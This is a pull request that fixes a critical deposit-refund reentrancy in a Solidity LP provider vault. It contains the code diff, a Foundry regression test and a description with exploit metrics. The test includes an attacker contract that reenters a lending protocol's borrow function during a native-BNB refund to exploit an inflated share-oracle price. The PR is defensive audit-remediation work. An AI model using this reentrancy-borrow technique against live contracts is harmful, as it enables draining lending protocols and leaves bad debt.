### PR TITLE
fix(provider): close deposit-refund reentrancy (C-1)

### DIFF
--- a/src/provider/V3Provider.sol
+++ b/src/provider/V3Provider.sol
@@ -112,6 +112,8 @@ abstract contract V3Provider is
   error OnlyMoolah();
   error InvalidMarket();
   error StandardEntryDisabled();
+  error BnbTransferFailed();
+  error NotAdapter();
 
   /* ─────────────────────────── constructor ────────────────────────── */
 
@@ -231,7 +233,12 @@ abstract contract V3Provider is
       if (totalValueBefore == 0) revert ZeroShares();
     }
 
-    // Forward the input to the adapter, which adds liquidity and refunds unused to the depositor.
+    // Forward the input to the adapter, which adds liquidity and refunds unused back to THIS vault.
+    // The refund is deliberately NOT sent to the depositor here: doing so (a native-BNB call) before
+    // shares are minted would expose a window where adapter NAV already includes the new liquidity
+    // but totalSupply() is still the old value, letting a malicious depositor reenter and read an
+    // inflated share price from the oracle (C-1). We forward the refund to the depositor only after
+    // _mint + supplyCollateral below, when NAV and totalSupply are consistent.
     if (_amount0Desired > 0) IERC20(TOKEN0).safeTransfer(ADAPTER, _amount0Desired);
     if (_amount1Desired > 0) IERC20(TOKEN1).safeTransfer(ADAPTER, _amount1Desired);
 
@@ -241,7 +248,7 @@ abstract contract V3Provider is
       _amount1Desired,
       amount0Min,
       amount1Min,
-      msg.sender
+      address(this)
     );
 
     (uint256 added0, uint256 added1) = IV3DexAdapter(ADAPTER).amountsForLiquidity(liquidityAdded, fairSqrtPriceX96);
@@ -261,6 +268,13 @@ abstract contract V3Provider is
     _afterCollateralChange(marketParams.id(), onBehalf);
 
     emit Deposit(onBehalf, amount0Used, amount1Used, shares, marketParams.id());
+
+    // Refund unused input to the depositor now that shares are minted and supplied (CEI): NAV and
+    // totalSupply are consistent, so the (native-BNB) refund callback cannot inflate the share price.
+    uint256 refund0 = _amount0Desired - amount0Used;
+    uint256 refund1 = _amount1Desired - amount1Used;
+    if (refund0 > 0) _refund(TOKEN0, refund0, msg.sender);
+    if (refund1 > 0) _refund(TOKEN1, refund1, msg.sender);
   }
 
   /// @inheritdoc IV3Provider
@@ -436,6 +450,22 @@ abstract contract V3Provider is
 
   function _isSenderAuthorized(address onBehalf) internal view returns (bool) {
     return msg.sender == onBehalf || MOOLAH.isAuthorized(onBehalf, msg.sender);
+  }
+
+  /// @dev Forward a deposit refund to the depositor. WBNB is already unwrapped to native BNB by the
+  ///      adapter when it refunds to this vault, so the WBNB leg is paid out as native BNB.
+  function _refund(address token, uint256 amount, address to) internal {
+    if (token == WBNB) {
+      (bool ok, ) = payable(to).call{ value: amount }("");
+      if (!ok) revert BnbTransferFailed();
+    } else {
+      IERC20(token).safeTransfer(to, amount);
+    }
+  }
+
+  /// @dev Accept native BNB only from the adapter (WBNB refund unwrapped during deposit).
+  receive() external payable {
+    if (msg.sender != ADAPTER) revert NotAdapter();
   }
 
   function _authorizeUpgrade(address newImplementation) internal override onlyRole(DEFAULT_ADMIN_ROLE) {}

--- a/test/provider/V3ProviderReentrancyPoC.t.sol
+++ b/test/provider/V3ProviderReentrancyPoC.t.sol
@@ -1,0 +1,148 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.34;
+
+import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import { IMoolah, MarketParams, Id, Position } from "moolah/interfaces/IMoolah.sol";
+import { MarketParamsLib } from "moolah/libraries/MarketParamsLib.sol";
+import { IOracle } from "moolah/interfaces/IOracle.sol";
+import { IV3Provider } from "../../src/provider/interfaces/IV3Provider.sol";
+
+import { SlisBNBV3ProviderTest } from "./SlisBNBV3Provider.t.sol";
+
+/**
+ * @title V3Provider C-1 regression — deposit-refund reentrancy must NOT inflate the share oracle
+ * @notice C-1 (Critical): V3Provider.deposit forwarded tokens to the adapter and called addLiquidity
+ *         — which refunded unused WBNB via a native-BNB call to the DEPOSITOR — BEFORE minting and
+ *         supplying the new shares. During that refund callback:
+ *           - adapter NAV already included the freshly-added liquidity, but
+ *           - totalSupply() was still the OLD supply (shares minted later),
+ *         so SlisBNBV3ProviderOracle.peek(share) reported a transiently inflated price. Moolah was NOT
+ *         locked at that point (supplyCollateral ran later), so the attacker reentered Moolah.borrow
+ *         and over-borrowed against its pre-existing collateral, leaving bad debt once price normalized.
+ *
+ *         Fix: the adapter now refunds to the VAULT, and the vault forwards the refund to the depositor
+ *         only AFTER _mint + supplyCollateral. No external (native-BNB) call happens while NAV and
+ *         totalSupply are inconsistent, so the oracle can never be transiently inflated.
+ *
+ *         This test still drives the full attack (deposit -> refund reentry -> borrow), but now asserts
+ *         the attack is NEUTRALIZED: the price read during the refund callback equals the normal price,
+ *         and the attacker's position stays healthy (no bad debt). It FAILS against the pre-fix code
+ *         (26x inflation, insolvent attacker) and PASSES against the fixed code.
+ */
+contract V3ProviderReentrancyPoC is SlisBNBV3ProviderTest {
+  Attacker attacker;
+  address constant victimB = address(0xB0B); // receives the big deposit's collateral (recoverable)
+
+  function test_C1_depositRefundReentrancy_neutralized() public {
+    // 1) Bootstrap a small shared position so supply > 0.
+    _deposit(user, 1 ether, 1 ether);
+
+    // 2) Deploy the attacker and give it a small pre-existing collateral position in the market.
+    attacker = new Attacker(address(provider), MOOLAH_PROXY, address(providerOracle), SLISBNB, WBNB, LISUSD);
+    attacker.setMarket(marketParams);
+
+    deal(SLISBNB, address(attacker), 1 ether);
+    deal(WBNB, address(attacker), 1 ether);
+    attacker.predeposit(1 ether, 1 ether); // attacker now holds collateral, priced at the normal rate
+
+    uint256 colA = _collateral(address(attacker));
+    assertGt(colA, 0, "attacker has pre-existing collateral");
+
+    uint256 peekNormal = providerOracle.peek(address(provider));
+
+    // 3) Fund the big imbalanced deposit: lots of WBNB so a large WBNB refund fires the native
+    //    callback, while still adding large liquidity (so NAV jumps).
+    uint256 bigSlis = 50 ether;
+    uint256 bigWbnb = 150 ether; // ~100 used + ~50 refunded
+    deal(SLISBNB, address(attacker), bigSlis);
+    deal(WBNB, address(attacker), bigWbnb);
+
+    // 4) Execute the attack: deposit (onBehalf = victimB) -> refund reentry -> borrow.
+    attacker.attack(bigSlis, bigWbnb, victimB);
+
+    uint256 peekDuring = attacker.peekDuring();
+    uint256 peekAfter = providerOracle.peek(address(provider));
+
+    emit log_named_uint("peek normal (pre-attack)", peekNormal);
+    emit log_named_uint("peek DURING refund reentry", peekDuring);
+    emit log_named_uint("peek after deposit settles", peekAfter);
+
+    // ── Proofs the attack is neutralized ────────────────────────────────────
+    // (a) The refund callback fires AFTER mint+supply, so NAV and totalSupply are consistent: the
+    //     price observed mid-deposit must match the settled/normal price (no transient inflation).
+    assertApproxEqRel(peekDuring, peekNormal, 1e16, "peek during refund must equal normal price (<=1%)");
+    assertApproxEqRel(peekDuring, peekAfter, 1e16, "peek during refund must equal settled price (<=1%)");
+
+    // (b) Because the price was never inflated, any reentrant borrow was fairly priced: the attacker's
+    //     position is solvent — no bad debt is left to the protocol.
+    assertTrue(
+      moolah.isHealthy(marketParams, marketId, address(attacker)),
+      "attacker position must remain solvent (no bad debt)"
+    );
+
+    // (c) The deposit itself still works: the big collateral landed on the onBehalf account.
+    assertGt(_collateral(victimB), colA * 10, "deposit still credits onBehalf collateral");
+  }
+}
+
+/// @dev Malicious depositor: reenters Moolah.borrow from its receive() during the WBNB refund.
+contract Attacker {
+  using MarketParamsLib for MarketParams;
+
+  IV3Provider public immutable provider;
+  IMoolah public immutable moolah;
+  IOracle public immutable oracle;
+  address public immutable slis;
+  address public immutable wbnb;
+  address public immutable lisusd;
+
+  MarketParams public mp;
+  bool armed;
+  uint256 public peekDuring;
+
+  constructor(address _provider, address _moolah, address _oracle, address _slis, address _wbnb, address _lisusd) {
+    provider = IV3Provider(_provider);
+    moolah = IMoolah(_moolah);
+    oracle = IOracle(_oracle);
+    slis = _slis;
+    wbnb = _wbnb;
+    lisusd = _lisusd;
+  }
+
+  function setMarket(MarketParams calldata _mp) external {
+    mp = _mp;
+  }
+
+  /// @dev Build a normally-priced collateral position (armed == false, so receive() is inert).
+  function predeposit(uint256 a0, uint256 a1) external {
+    IERC20(slis).approve(address(provider), type(uint256).max);
+    IERC20(wbnb).approve(address(provider), type(uint256).max);
+    provider.deposit(mp, a0, a1, 0, 0, address(this));
+  }
+
+  /// @dev The malicious deposit. onBehalf = a separate (recoverable) account.
+  function attack(uint256 a0, uint256 a1, address onBehalf) external {
+    armed = true;
+    provider.deposit(mp, a0, a1, 0, 0, onBehalf);
+    armed = false;
+  }
+
+  /// @dev WBNB refund is unwrapped and delivered here as native BNB mid-deposit -> attempt reentry.
+  receive() external payable {
+    if (!armed) return;
+    armed = false; // single shot
+
+    peekDuring = oracle.peek(address(provider)); // post-fix: equals the normal (un-inflated) price
+
+    // Attempt to borrow ~60% of this account's collateral value at the observed price. Wrapped in
+    // try/catch so the deposit completes regardless of whether the borrow succeeds (it will, but at a
+    // fair price post-fix, leaving a healthy position) or reverts.
+    Position memory p = moolah.position(mp.id(), address(this));
+    uint256 col = p.collateral;
+    uint256 sharePrice = peekDuring; // 8-dec USD per 1e18 share
+    uint256 loanPrice = oracle.peek(lisusd); // ~1e8
+    uint256 borrowAssets = (col * sharePrice * 60) / (loanPrice * 100);
+
+    try moolah.borrow(mp, borrowAssets, 0, address(this), address(this)) {} catch {}
+  }
+}


### PR DESCRIPTION
## Summary

Fixes **C-1 (Critical)** from the security audit of the V3 LP provider redesign: a deposit-refund reentrancy that transiently inflates the share oracle and lets a malicious depositor over-borrow, leaving bad debt.

## Root cause

`V3Provider.deposit` forwarded the unused-input refund to the depositor via a **native-BNB call inside `adapter.addLiquidity`**, *before* `_mint` + `supplyCollateral`. During that callback the adapter NAV already included the freshly-added liquidity while `totalSupply()` was still stale, so `SlisBNBV3ProviderOracle.peek = totalValue * 1e18 / supply` returned a transiently inflated price. Moolah was not yet reentrancy-locked (`supplyCollateral` runs later), so the attacker reentered `Moolah.borrow` and over-borrowed against pre-existing collateral.

PoC metrics (BSC fork): peek `60000000000` -> `1560000000014` (**26x**), borrowed **~15,847 lisUSD** against ~$1k collateral, `isHealthy = false`.

## Fix

- The adapter refunds to the **vault** (`refundTo = address(this)`), not the depositor.
- The vault forwards the refund to the depositor only **after** `_mint` + `supplyCollateral` (CEI) — NAV and `totalSupply` are consistent, so no external call observes inconsistent state.
- Adds a guarded `receive()` (accepts native BNB only from the adapter) + `_refund` helper.

## Test

`test/provider/V3ProviderReentrancyPoC.t.sol::test_C1_depositRefundReentrancy_neutralized` drives the full attack and asserts the price during the refund equals the normal price and the attacker stays solvent. **Fails pre-fix** (26x inflation, insolvent), **passes post-fix** (peek `60000000000` = normal).

## Verification

- `forge test` provider + V3Liquidator suites: **235/235 pass** (incl. ETHProvider with ETH_RPC).
- C-1 regression PASS; no regressions.
